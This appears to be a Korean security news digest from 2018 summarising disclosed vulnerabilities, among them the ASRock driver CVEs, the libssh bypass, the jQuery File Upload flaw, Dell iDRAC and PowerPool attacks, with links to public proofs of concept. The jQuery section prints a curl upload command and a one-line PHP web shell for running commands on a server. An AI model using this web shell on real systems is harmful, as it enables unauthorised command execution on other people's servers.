해외 보안 트렌드

<회사정보>

세계에서 3번째로 큰 마더보더 회사로 본사는 대만 타이페이에 위치.

<발견회사>

SecureAuth

<취약점>

ASRock RGBLED, A-Tuning, F-Stream, RestartToUEFI 취약점 존재로 공격자가 시스템 권한 상승 가능.

(CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712)

<취약대상>

ASRock RGBLED과 다른 ASRock 브랜드 유틸리티가 설치된 AsrDrv101.sys, AsrDrv102.sys low-level 드라이버 

<관련 CVE코드>

CVE-2018-10709 : 컨트롤 레지스터(CR) 값을 읽고 쓸 수 있으며 상승된 권한을 이용해 코드 실행가능

CVE-2018-10710 : 입력 출력 컨트롤 코드와 관련되며 임의의 메모리를 읽고 쓸 수 있어 권한 상승을 유발함 

CVE-2018-10711 : Machine Specific Register(MSRs)를 읽고 쓸 수 있어 공격자가 임의의 ring-0 code를 실행시킬 수 있음

CVE-2018-10712 : IO 포트로부터 데이터를 읽거나 쓰기가 가능해 공격자가 상승된 권한으로 코드를 실행가능

PoC : https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities

<대응방안>

패치 : 취약 어플리케이션에 대한 패치를 이미 배포함

ASRock RGBLED v1.0.36, A-Tuning v3.0.216, F-Stream v3.0.216, and RestartToUEFI v1.0.7

출처 : https://www.securityweek.com/multiple-vulnerabilities-patched-asrock-drivers

최근 있었던 Windows Task Scheduler 제로데이트와 유사하며 동일인 SandboxEscaper가 발견.

Microsoft Data Sharing libary dssvc.dll에 영향을 끼치나 공격을 위해서는 공격대상에 대한 접근이 가능해야 함 

Admin이 아닌 자가 랜덤 파일을 삭제 가능

(->어플리케이션의 dll파일 이나 시스템 서비스에 사용되는 파일(c:\windows\temp)등을 삭제 후 하이제킹이 가능)

취약대상: 최신 Windows 10(패치 완전히 된), Windows Server 2016,Windows Server 2019

공격난이도: 어려움

PoC: https://github.com/SandboxEscaper/randomrepo/blob/master/PoCLPE.rar

패치: 0patch 라는 3rd party 회사에서 발표(https://twitter.com/0patch/status/1055091501498318849)

출처 : https://www.securityweek.com/exploit-new-windows-zero-day-published-twitter

        https://threatpost.com/windows-deletebug-zero-day-allows-privilege-escalation-destruction/138550/

<Cisco 취약 '가능' 모델> (현재 조사중이며 의심리스트에 해당하지 않으면 취약하지 않은것으로 판단)

출처: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181019-libssh

Collaboration and Social Media

•Cisco Webex Meetings Server

Network Application, Service, and Acceleration

•Cisco Cloud Services Platform 2100

Network and Content Security Devices

•Cisco Content Security Management Appliance (SMA)

•Cisco Email Security Appliance (ESA)

•Cisco Identity Services Engine (ISE)

•Cisco Web Security Appliance (WSA)

Network Management and Provisioning

•Cisco Enterprise Service Automation

•Cisco NetFlow Generation Appliance

•Cisco Network Analysis Module

•Cisco Prime Network Registrar Virtual Appliance

•Cisco WAN Automation Engine (WAE)

Routing and Switching - Enterprise and Service Provider

•Cisco Application Policy Infrastructure Controller (APIC)

Voice and Unified Communications Devices

•Cisco IP Interoperability and Collaboration System (IPICS)

•Cisco Management Heartbeat Server

Video, Streaming, TelePresence, and Transcoding Devices

•Cisco Cloud Object Storage

•Cisco DCM Series D990x Digital Content Manager

•Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras

Wireless

•Cisco Wireless LAN Controller

Cisco Cloud Hosted Services

•Cisco Smart Software Manager Satellite

•Cisco Virtual HetNet

<F5 Network 취약제품> 패치無

출처: https://support.f5.com/csp/article/K52868493

•BIG-IP(D 747104) (AFM) 14.0.0  

•BIG-IP(D 747104) (AFM) 13.0.0 - 13.1.1

•BIG-IP(D 747104) (AFM) 12.1.0 - 12.1.3

<Debian 취약버전> 패치有 

출처: https://www.debian.org/security/2018/dsa-4322

•0.7.3-2+deb9u1 

<Ubuntu 취약버전> 패치有

출처: https://usn.ubuntu.com/3795-1/

•Ubuntu 18.04 LTS

•Ubuntu 16.04 LTS

•Ubuntu 14.04 LTS

•위 버전의 파생버전

<Suse 취약버전> 패치有

https://www.suse.com/security/cve/CVE-2018-10933/

•Linux Enterprise 12

•Linux Enterprise 15

<관련 CVE코드>

CVE-2018-1033

PoC : https://github.com/hackerhouse-opensource/cve-2018-10933

<대응방안>

Tenable, libssh 취약여부 진단 Nessus 플러그인 배포

출처: https://www.tenable.com/blog/libssh-vulnerable-to-authentication-bypass-cve-2018-10933

플러그인 리스트: https://www.tenable.com/plugins/search?q=cves%3A(%22CVE-2018-10933%22)&sort=&page=1

jQuery File Upload Plugin Vulnerability (CVE-2018-9206)

발견자 : 아카마이 Larry Cashdollar가 발견함.

*jQuery file upload:jQuery 위젯으로 다수 파일 선택, 드래그&드랍 지원, 진행바, 이미지/오디오/비디오 파일 검증 도구 함유

<영향받는 제품>

기본 HTML 형식의 파일 업로드 형태를 지원하는 모든 서버 플랫폼이 해당함 - PHP, Python, Ruby on Rails, Java, Node.js, GO. 2010년도 등의 오래된 버전도 해당됨.

해당 플러그인이나 플러그인을 토대로 만들어진 코드들은 이 취약점을 가지고 있으며, 취약점을 이용한 공격방법은 유투브에서 쉽게 찾아 볼 수 있음. 단독으로 사용되는 웹 어플리케이션부터 워드프레스 플러그인 등 다른 컨텐츠 관리 시스템들이 모두 해당됨.

<취약원인>

성능항샹과(아파치가 디렉토르에 접근할때마다 .htaccess 파일을 체크하지 않아되기 때문) 서버에 셋팅된 보안 설정을 사용자가 오버라이드 하지 못하도록 2.3.9. 버전부터 .htaccess를 사용불가능하게 한 것이 주된 원인. jQuery File Upload PHP는 보안을 .htaccess 파일에 의존함.이 취약점은 플러그인이 파일 업로드를 컨텐츠 유형 이미지로만 업로드를 허용하면서 발생함. 

<재현>

server/php 폴더: upload.php, UploadHandler.php: 파일 업로드 코드가 있음

파일은 서버 루트 패스의 files/ 폴더에 저장되고 이를 공격자가 웹 쉘을 업로드하여 서버에 명령어들을 실행할 수 있음

1) 명령어 실행 

$ curl -F ""files=@shell.php"" http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET['cmd']; system($cmd);?>

2) cmd=id 테스트 웹 서버에 연결된 브라우저는 웹서버가 실행중은 프로세서 id 값을 리턴함.

- 영향성: 파일업로드와 코드실행 취약점 및 데이터 유출, 악성코드 감염, 변조 등 다양한 공격에 취약하게 만듦. 

취약한 플러그인을 포킹해서 사용하는 프로젝트들 중 얼마나 많은 수의 프로젝트들이 안전하게 유지,관리되고 있는지 알 수 없고, 이 플러그인을 포킹한 프로젝트들이 어떤 것들인지 알 길이 없음.

<관련 CVE코드>

CVE-2018-9206

PoC : https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206

출처: https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html

  https://www.securityweek.com/0-day-jquery-plugin-impacts-thousands-applications

아이폰 비밀번호 우회 취약점으로 앨범에 접근 아무 번호로 사진 전송이 가능

최신 iOS 12 버전을 사용하는 모든 아이폰에 해당 됨

출처 : https://thehackernews.com/2018/10/iphone-lock-passcode-bypass.html"

Dell BMC iDRAC 14th Generaion Plan

*BMC: 임베디드 컴퓨터로 서버 하드 속에 설치되어 'remote administrator(원격제어)'역할을 수행 함.

*iDRAC: PowerEdge 서버의 모든 제어가 가능한 작은 리눅스 컴퓨터. “integrated Dell Remote Access Controller unauthorized load access”

<중요성>

 서버 전원 온/오프 부터, 소프트웨어로 통제되는 USB 드라이버가 메인 프로세서에 연결된 가상 USB포트로 인식되게 할 수 있음

 (-> 원격 디스크 이미지를 가지고 서버를 부팅할 수 도 있고, OS가 돌고 있는 동안 가상 오토런 USB 스틱을 삽입도 가능하며, BIOS/펌웨어를 지워 서버가 부팅되지 않도록 할 수 있고, 심지어 모든 fan을 꺼 오버히팅을 발생시켜 서버에 영구적이 피해를 입힐 수 있음.)

<취약점>

 서버의 직접적인 접근은 매우 쉬움

 원격으로는 유효한 로그인이 필요함.

 서버에 한번 접근시 그 서버의 모든 제어가 가능함.

 iDRAC 8~13 버전 서버: BMC 펌웨어 이미지를 조작이 가능한 하드웨어와 원격접근 가능성 두가지를 모두 가지고 있음

펌웨어 이미지 조작은 iDRAC 유저와 OS가 감지할수 없는 지속적인 원격과 통제된 접근 허용이 가능케 함

https://github.com/Fohdeesha/idrac-7-8-reverse-engineering/blob/master/README.md

<해결방안>

 안티바이러스 전무, 유일한 방법은 사용자가 iDRAC의 완벽한 루트 접근을 가지고 있어 스스로 해킹을 당하고 있는지 확인하는 수 밖에 없음. 

이 또한 Dell이나 다른 제조회사차원에서 모든 사람들에게 루트 접근을 막아 놓아기 때문에 불가능함. 

따라서 임베디드 컴퓨터(iDRAC)가 무엇을 하는지 확인할 수 있는 방법이 없음.

* 최신 iDRAC 14버전은 이 취약점을 해결되서어 생산되는 중. 이전의 버전들과 똑같이 서버의 모든 것을 컨트롤 할 수 있지만 접근이 더욱 어렵도록 업데이트 됨 

 <시사점>

 Dell은 다른 제조사들에 비해 서버 보안에 많은 투자를 하는 편임.

 BMC 임베디드 컴퓨터는 대부분의 서버에 사용이 되고 다른 제조사들의 서버들도 비슷한 취약점을 가질 것으로 예상이 되며,

 상대적으로 작은 제조회사들은 이에 대한 대응이 원활하지 않을 것으로 보임.

 루트 권한이 없는 유저가 피해를 확인하거나 예방하는 것이 불가능하기 때문에 BMC 취약점은 서버 산업 전체를 위협할 수 있음.

출처: https://www.servethehome.com/idracula-vulnerability-impacts-millions-of-legacy-dell-emc-servers/"

PowerPool그룹 - 8월27일 발견된 윈도우 취약점 코드를 수정하여 미국, 영국, 독일, 우크리아니, 칠레, 인도, 러시아, 필리핀, 폴란드 소규모 유저들을 공격

<공격 방법>

공식 크롬 어플리케이션 업데이트 파일을() C:\Program Files(x86)\Google\Update\GoogleUpdate.exe) 자신들의 악성코드로 덮어씀

PowerPool그룹은 초창기 공격 대상에게 악성코드를 심은 이메일을 보내는 공격을 했던 것으로 보임.

지난 5월 SANS 포럼에서 다루어진 Symbolic 링크(.slk)를 이용한 스팸을 이용한 악성코드 유포 또한 이 그룹에 의한 것으로 밝혀짐.

<공격 패턴>

1) 정찰을 목적으로한 1단계 백도어를 포함한 이메일 전달. 감염된 기기가 공격자의 공격에 관심을 갖게 됨 -> 악성코드가 2단계 백도어(시스템 명령어를 실행이 가능, 파일 업로드 다운로드 가능, 프로세스 죽이기 폴더 리스팅 등이 가능)를 다운로드함

2) 2단계 백도어를 통해 감염된 기기들이 다운로드한 파일은 공격자가 네트워크 상 이동이 가능하도록 도와주는 오픈 소스의 툴 들임. PowerDump, PowerSploit, SMBExec, Quarks PwDump, FireMaster.

출처: https://www.securityweek.com/windows-zero-day-exploited-targeted-attacks-powerpool-group